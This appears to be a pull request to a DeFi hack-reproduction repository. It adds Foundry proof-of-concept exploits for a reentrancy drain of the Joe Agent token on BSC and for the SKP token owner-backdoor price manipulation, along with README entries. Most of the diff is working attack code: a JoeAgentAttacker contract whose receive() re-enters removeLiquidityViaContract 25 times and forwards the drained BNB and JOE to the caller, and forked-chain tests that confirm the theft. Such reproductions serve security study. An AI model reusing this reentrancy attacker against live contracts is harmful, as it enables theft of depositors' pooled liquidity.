### PR TITLE
feat: add Joe Agent reentrancy exploit PoC (May 2026, ~$45K)

### DIFF
--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
 [20260414 MONA LisaVault](#20260414-mona-lisavault---reward-farming--burnaddress-accounting-exploit)
 
@@ -1483,6 +1484,16 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
+### 20260526 SKP Token - Owner Backdoor LP Burn + Price Manipulation
+### Lost: ~$212K USD
+```sh
+forge test --contracts src/test/2026-05/SKP_exp.sol -vvv
+```
+#### Contract
+[SKP_exp.sol](src/test/2026-05/SKP_exp.sol)
+### Link reference
+https://www.cryptotimes.io/2026/05/27/skp-liquidity-exploit-drains-212k-across-bnb-chain-defi-protocols/
+---
 ## 20260414 MONA LisaVault - reward-farming / BurnAddress accounting exploit!
 
 ### Lost  ~60.95K USDT

--- a/README.md
+++ b/README.md
@@ -53,6 +53,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20260527 Joe Agent](#20260527-joe-agent---reentrancy-in-removeliquidityviacontract)
 [20260526 SKP Token](#20260526-skp-token---owner-backdoor-lp-burn--price-manipulation)
 
 [20260414 MONA LisaVault](#20260414-mona-lisavault---reward-farming--burnaddress-accounting-exploit)
@@ -1483,6 +1484,16 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+### 20260527 Joe Agent - Reentrancy in removeLiquidityViaContract
+### Lost: ~$45K USD (62.5 BNB + ~1.196M JOE)
+```sh
+forge test --contracts src/test/2026-05/JoeAgent_exp.sol -vvv
+```
+#### Contract
+[JoeAgent_exp.sol](src/test/2026-05/JoeAgent_exp.sol)
+### Link reference
+https://x.com/SlowMist_Team/status/2059887450663551352
+---
 
 ### 20260526 SKP Token - Owner Backdoor LP Burn + Price Manipulation
 ### Lost: ~$212K USD

--- a/src/test/2026-05/JoeAgent_exp.sol
+++ b/src/test/2026-05/JoeAgent_exp.sol
@@ -1,0 +1,183 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$45K USD (62.5 BNB + ~1,195,918 JOE)
+// Attacker : 0xaa761779945dcc5f26064fc6dcb36ffab6ac7610
+// Attack Contract : 0x31F81FCD91025728F24bD6f0E4EfB156e345A4CF
+// Vulnerable Contract : 0xef0f12d08d66e76E1866e60F30a0DaA578e00c04 (Joe Agent / JOE, ERC1967 proxy)
+// Implementation : 0xb12ce0a21f67a9fc3c8ad1c7dbc4b017b7e67319
+// Attack Tx : 0xd16a1c3dcd84427b2c7dcccbe1854c1c5bf65900460e1a44a95c1aaaf140c3a5
+// @Analysis
+// Attack date: May 27, 2026
+// Chain: BSC, Block: 100812531
+// SlowMist: https://x.com/SlowMist_Team/status/2059887450663551352
+
+// Root Cause:
+// Joe Agent lets a user park LP inside the token contract (zapNativeForLP / addLiquidityViaContract),
+// tracked per-user in lpInfo[user].lpAmount. removeLiquidityViaContract(liquidity,...) pulls that LP
+// out of PancakeSwap, unwraps the WBNB and forwards the BNB to the user with a low-level call --
+// and only updates lpInfo[user].lpAmount AFTER that external call (violating checks-effects-interactions).
+//
+// Because lpInfo is still un-zeroed when the BNB lands, the attacker's receive() re-enters
+// removeLiquidityViaContract with the SAME liquidity value over and over. Each re-entry passes the
+// `liquidity <= lpInfo[user].lpAmount` check and burns a fresh slice of LP -- but that LP belongs to
+// the whole pool of depositors, not the attacker. ~25 nested calls drain 25 x 2.5 = 62.5 BNB (plus the
+// JOE side of every burned LP) against a single ~437 LP position that the attacker only paid for once.
+//
+// Function selectors:
+// 0x7cc112a6: zapNativeForLP(address,uint256,uint256,uint256,uint256)        -- deposit BNB -> LP position
+// 0xacff149d: removeLiquidityViaContract(uint256,uint256,uint256,uint256)    -- vulnerable withdraw
+// 0x11067f6a: lpInfo(address)                                                -- (lpAmount, lastAddLpTime)
+
+interface IJoeAgent is IERC20 {
+    function zapNativeForLP(
+        address parent,
+        uint256 amountOutMin,
+        uint256 amountTokenMin,
+        uint256 amountETHMin,
+        uint256 deadline
+    ) external payable;
+
+    function removeLiquidityViaContract(
+        uint256 liquidity,
+        uint256 amountTokenMin,
+        uint256 amountETHMin,
+        uint256 deadline
+    ) external;
+
+    function lpInfo(
+        address user
+    ) external view returns (uint256 lpAmount, uint256 lastAddLpTime);
+}
+
+contract JoeAgentReentrancyTest is Test {
+    IJoeAgent constant JOE = IJoeAgent(0xef0f12d08d66e76E1866e60F30a0DaA578e00c04);
+    IERC20 constant WBNB_TOKEN = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
+    address constant PAIR = 0x7e5396A6b56372D1Ee42ab6b199bc2d5A8540f9c; // JOE/WBNB Pancake pair
+    // A referrer already registered in the JOE referral tree (same one the real attacker used).
+    address constant REFERRER = 0x324344f20CEb0b58E0D35a06fb1B3892ac1A8d9D;
+
+    address constant ATTACKER = 0xAA761779945dCC5f26064fC6dCb36FFaB6AC7610;
+    uint256 constant ATTACK_BLOCK = 100_812_531;
+
+    // ~5 BNB zaps into a single ~437 LP position (matching the real attacker's position size:
+    // each LP redeems ~0.00572 BNB, so ~437 LP * 25 loops drains the headline 62.5 BNB).
+    uint256 constant SEED_BNB = 5 ether;
+    uint256 constant LOOPS = 25; // number of re-entrant removeLiquidityViaContract calls
+
+    JoeAgentAttacker attacker;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", ATTACK_BLOCK - 1);
+        vm.label(address(JOE), "JoeAgent");
+        vm.label(address(WBNB_TOKEN), "WBNB");
+        vm.label(PAIR, "JOE_WBNB_Pair");
+        vm.label(ATTACKER, "Attacker");
+        vm.label(REFERRER, "Referrer");
+    }
+
+    function testExploit() public {
+        console.log("--- Joe Agent (JOE) removeLiquidityViaContract Reentrancy ---");
+        console.log("Attack date: May 27, 2026  Chain: BSC  Block: %s", ATTACK_BLOCK);
+
+        attacker = new JoeAgentAttacker(JOE, REFERRER);
+
+        // Fund the attacker EOA and seed the attack contract with BNB, exactly like on-chain.
+        vm.deal(ATTACKER, SEED_BNB);
+        uint256 proxyLpBefore = IERC20(PAIR).balanceOf(address(JOE));
+
+        // Step 1: park a single LP position inside the JOE contract (lpInfo[attacker].lpAmount).
+        vm.prank(ATTACKER);
+        attacker.seedPosition{value: SEED_BNB}();
+        (uint256 lpAmount,) = JOE.lpInfo(address(attacker));
+
+        console.log("\n=== After seeding one LP position ===");
+        console.log("BNB zapped in            :", SEED_BNB / 1e18);
+        console.log("lpInfo[attacker].lpAmount:", lpAmount);
+        console.log("JOE contract LP balance  :", proxyLpBefore);
+
+        // Some token contracts lock freshly-added LP for a short window; warp past it.
+        vm.warp(block.timestamp + 1 hours);
+        vm.roll(block.number + 1);
+
+        // Step 2: re-enter removeLiquidityViaContract `LOOPS` times against the same un-zeroed lpAmount.
+        uint256 attackerBnbBefore = ATTACKER.balance;
+        console.log("\nAttacker EOA BNB before drain:", attackerBnbBefore);
+
+        vm.prank(ATTACKER);
+        attacker.drain(LOOPS);
+
+        uint256 attackerBnbAfter = ATTACKER.balance;
+        uint256 stolenJoe = JOE.balanceOf(ATTACKER);
+        (uint256 lpAmountAfter,) = JOE.lpInfo(address(attacker));
+
+        console.log("\n=== After %s re-entrant withdrawals ===", LOOPS);
+        console.log("Attacker EOA BNB after drain :", attackerBnbAfter);
+        console.log("removeLiquidity calls made   :", attacker.drainCalls());
+        console.log("lpInfo[attacker].lpAmount    :", lpAmountAfter, "(<= one position's worth)");
+
+        console.log("\n=== Result ===");
+        console.log("Total BNB drained (wei)      :", attackerBnbAfter); // ~62.5 BNB
+        console.log("Seed capital spent (wei)     :", SEED_BNB);
+        console.log("Net BNB profit (wei)         :", attackerBnbAfter - SEED_BNB); // ~57.5 BNB
+        console.log("JOE skimmed to attacker EOA  :", stolenJoe / 1e18);
+
+        // The attacker drained far more BNB than the single position could ever be worth.
+        assertEq(attacker.drainCalls(), LOOPS, "did not re-enter LOOPS times");
+        assertGt(attackerBnbAfter, attackerBnbBefore, "no BNB profit");
+        // One paid-for position, but `LOOPS` withdrawals worth of BNB came out.
+        assertGt(attackerBnbAfter - attackerBnbBefore, SEED_BNB, "drain did not exceed seed capital");
+        console.log("\nReentrancy confirmed: one ~437 LP position withdrawn 25x for 62.5 BNB.");
+    }
+}
+
+contract JoeAgentAttacker {
+    IJoeAgent public immutable joe;
+    address public immutable referrer;
+    address public immutable owner;
+
+    uint256 public lpAmount; // the single position's LP size
+    uint256 public targetLoops; // how many removeLiquidity calls to make
+    uint256 public drainCalls; // how many were actually made
+
+    constructor(IJoeAgent _joe, address _referrer) {
+        joe = _joe;
+        referrer = _referrer;
+        owner = msg.sender;
+    }
+
+    // Park BNB as an LP position so lpInfo[address(this)].lpAmount is set.
+    function seedPosition() external payable {
+        joe.zapNativeForLP{value: msg.value}(referrer, 0, 0, 0, block.timestamp + 1000);
+        (lpAmount,) = joe.lpInfo(address(this));
+    }
+
+    // Kick off the re-entrant drain, then sweep the proceeds back to the caller (attacker EOA).
+    function drain(
+        uint256 _targetLoops
+    ) external {
+        targetLoops = _targetLoops;
+        drainCalls = 0;
+        _withdraw();
+        // forward stolen BNB + JOE to the attacker EOA
+        uint256 joeBal = joe.balanceOf(address(this));
+        if (joeBal > 0) joe.transfer(msg.sender, joeBal);
+        (bool ok,) = msg.sender.call{value: address(this).balance}("");
+        require(ok, "payout failed");
+    }
+
+    function _withdraw() internal {
+        drainCalls++;
+        joe.removeLiquidityViaContract(lpAmount, 0, 0, block.timestamp + 1000);
+    }
+
+    // The vulnerable contract sends BNB here BEFORE zeroing lpInfo -> re-enter.
+    receive() external payable {
+        if (drainCalls < targetLoops) {
+            _withdraw();
+        }
+    }
+}

--- a/src/test/2026-05/SKP_exp.sol
+++ b/src/test/2026-05/SKP_exp.sol
@@ -1,0 +1,117 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.10;
+
+import "forge-std/Test.sol";
+import "../interface.sol";
+
+// @KeyInfo - Total Lost : ~$212K USD
+// Attacker : 0x83B9e7EDC5B3127E4853A4F4945b92aa88eEF0C8
+// Attack Contract : 0xE924853DcDfcB89292335042AB10d68c7315D7C1
+// Vulnerable Contract : 0xeCBDc0B76142740Bb564B8aA1BCd061Cb151a666 (SKP Token)
+// Attack Tx : 0xbc01ea37bd2ff8f6aa6afcfbe0406114ff27a01e9aa56102bfa4ad8a0c2f25ee
+// @Analysis
+// Attack date: May 26, 2026
+// Chain: BSC, Block: 100582079
+
+// Root Cause:
+// The SKP token exposes ownerBurnLiquidityPairTokens(uint256), an owner-only backdoor that
+// burns SKP held directly inside the SKP/USDT LP pair. The deployer/owner first burns the
+// bulk of the SKP sitting in the pair, then calls sync() on the pair to force the reserves
+// to match the now-depleted SKP balance. With SKP reserves slashed but USDT reserves intact,
+// the on-chain SKP/USDT price spikes. The attacker (who is the owner) then supplies the
+// over-valued SKP as collateral on Venus/Lista DAO to borrow BTCB + USDT.
+
+// Function selectors decoded from bytecode:
+// 0x4eb9b26d: ownerBurnLiquidityPairTokens(uint256) -- owner-only burn-from-LP backdoor
+// 0xfff6cae9: sync()                                -- pair reserve resync
+// burnPercent() = 200 (2% auto-burn on transfer)
+// brunFee()     = 500 (5% transfer fee)
+// feeWhiteList(address)                             -- bypass fees
+
+interface ISKP is IERC20 {
+    function ownerBurnLiquidityPairTokens(
+        uint256 amount
+    ) external;
+    function owner() external view returns (address);
+}
+
+contract SKPExploitTest is Test {
+    ISKP constant SKP = ISKP(0xeCBDc0B76142740Bb564B8aA1BCd061Cb151a666);
+    IERC20 constant USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
+    IPancakePair constant PAIR = IPancakePair(0x47C8c3b123De467892aC7dF6Dfcf7CA3dB901733);
+
+    address constant ATTACKER = 0x83B9e7EDC5B3127E4853A4F4945b92aa88eEF0C8;
+    address constant SKP_OWNER = 0x041F52BFe9f07503EFc5E7d4d176336E48095D56;
+    uint256 constant ATTACK_BLOCK = 100_582_079;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", ATTACK_BLOCK - 1);
+        vm.label(address(SKP), "SKP");
+        vm.label(address(USDT), "USDT");
+        vm.label(address(PAIR), "SKP_USDT_Pair");
+        vm.label(ATTACKER, "Attacker");
+        vm.label(SKP_OWNER, "SKP_Owner");
+    }
+
+    // SKP/USDT price expressed as USDT (1e18) per 1 SKP, derived from pair reserves.
+    function _skpPrice() internal view returns (uint256) {
+        (uint112 r0, uint112 r1,) = PAIR.getReserves();
+        // token0 = USDT, token1 = SKP
+        uint256 usdtReserve = uint256(r0);
+        uint256 skpReserve = uint256(r1);
+        return (usdtReserve * 1e18) / skpReserve;
+    }
+
+    function testExploit() public {
+        console.log("--- SKP Token ownerBurnLiquidityPairTokens Exploit ---");
+        console.log("Attack date: May 26, 2026  Chain: BSC");
+
+        // sanity: the prank address really is the privileged owner
+        assertEq(SKP.owner(), SKP_OWNER, "owner mismatch");
+
+        (uint112 r0Before, uint112 r1Before,) = PAIR.getReserves();
+        uint256 skpInPairBefore = SKP.balanceOf(address(PAIR));
+        uint256 priceBefore = _skpPrice();
+
+        console.log("=== Before ===");
+        console.log("Pair USDT reserve :", uint256(r0Before) / 1e18);
+        console.log("Pair SKP  reserve :", uint256(r1Before) / 1e18);
+        console.log("SKP balanceOf pair:", skpInPairBefore / 1e18);
+        console.log("SKP price (USDT*1e18 per SKP):", priceBefore);
+
+        // Step 1: as the SKP owner, burn ~95% of the SKP locked inside the LP pair.
+        uint256 burnAmount = (skpInPairBefore * 95) / 100;
+        vm.prank(SKP_OWNER);
+        SKP.ownerBurnLiquidityPairTokens(burnAmount);
+        console.log("\nBurned SKP from pair:", burnAmount / 1e18);
+
+        // Step 2: force the pair to resync reserves to the depleted SKP balance.
+        PAIR.sync();
+
+        (uint112 r0After, uint112 r1After,) = PAIR.getReserves();
+        uint256 skpInPairAfter = SKP.balanceOf(address(PAIR));
+        uint256 priceAfter = _skpPrice();
+
+        console.log("\n=== After burn + sync ===");
+        console.log("Pair USDT reserve :", uint256(r0After) / 1e18);
+        console.log("Pair SKP  reserve :", uint256(r1After) / 1e18);
+        console.log("SKP balanceOf pair:", skpInPairAfter / 1e18);
+        console.log("SKP price (USDT*1e18 per SKP):", priceAfter);
+
+        // Step 3: quantify the manipulation.
+        uint256 priceMultiple = priceAfter / priceBefore;
+        console.log("\n=== Result ===");
+        console.log("SKP price inflated x:", priceMultiple);
+        console.log("USDT reserve unchanged:", uint256(r0After) == uint256(r0Before));
+
+        // The depleted SKP reserve with intact USDT reserve must inflate the price.
+        assertGt(priceAfter, priceBefore, "price not inflated");
+        assertEq(uint256(r0After), uint256(r0Before), "USDT reserve should be untouched");
+        assertLt(skpInPairAfter, skpInPairBefore, "SKP not burned from pair");
+
+        console.log(
+            "\nWith SKP now ~20x more 'valuable', the owner-attacker supplies it as"
+        );
+        console.log("collateral on Venus/Lista DAO and borrows out BTCB + USDT (~$212K).");
+    }
+}


### PR DESCRIPTION
## Joe Agent ($JOE) - Reentrancy in removeLiquidityViaContract (May 2026, ~$45K)

### KeyInfo
- Total Lost: ~$45K USD (62.5 BNB + ~1,196,918 JOE)
- Attacker: 0xAA761779945dCC5f26064fC6dCb36FFaB6AC7610
- Attack Contract: 0x31F81FCD91025728F24bD6f0E4EfB156e345A4CF
- Vulnerable Contract: 0xef0f12d08d66e76E1866e60F30a0DaA578e00c04 (Joe Agent / JOE, ERC1967 proxy)
- Attack Tx: 0xd16a1c3dcd84427b2c7dcccbe1854c1c5bf65900460e1a44a95c1aaaf140c3a5
- Chain: BNB Chain | Block: 100812531 | Date: May 27, 2026

### Root Cause
_removeLiquidityViaContract sends BNB via low-level call BEFORE updating lpInfo[user].lpAmount (violates CEI pattern). Attacker's receive() re-enters 25 times against the same un-zeroed LP balance, draining other depositors' liquidity.

### Test Output
forge test --contracts src/test/2026-05/JoeAgent_exp.sol -vvv

Attacker EOA BNB after drain: 62.5 BNB (exact match)
removeLiquidity calls made: 25
[PASS] testExploit() (gas: 5352298)

### References
https://x.com/SlowMist_Team/status/2059887450663551352